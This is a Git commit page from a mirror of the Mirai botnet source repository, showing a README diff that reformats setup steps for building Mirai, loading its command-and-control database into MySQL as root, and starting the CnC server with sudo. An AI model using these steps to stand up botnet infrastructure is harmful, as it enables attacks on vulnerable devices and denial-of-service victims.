mirror of
https://github.com/jgamblin/Mirai-Source-Code
synced 2025-07-13 15:22:51 +00:00
Changes to be committed:
modified: README.md
This commit is contained in:
parent
965ab0d627
commit
c8381aa219
@ -35,9 +35,11 @@ steps to setup build environment
|
||||
- cd /vagrant/mirai
|
||||
- ./build.sh
|
||||
|
||||
Steps to create database
|
||||
cat Configure_CNC_Database.txt | mysql -u root --password=password
|
||||
Steps to create database:
|
||||
`cat Configure_CNC_Database.txt | mysql -u root --password=password`
|
||||
|
||||
Start the CnC
|
||||
make a prompt file in ./release
|
||||
- make a prompt file in ./release
|
||||
- `cd ./release`
|
||||
- `sudo ./cnc`
|
||||
|
||||
|
Loading…
x
Reference in New Issue
Block a user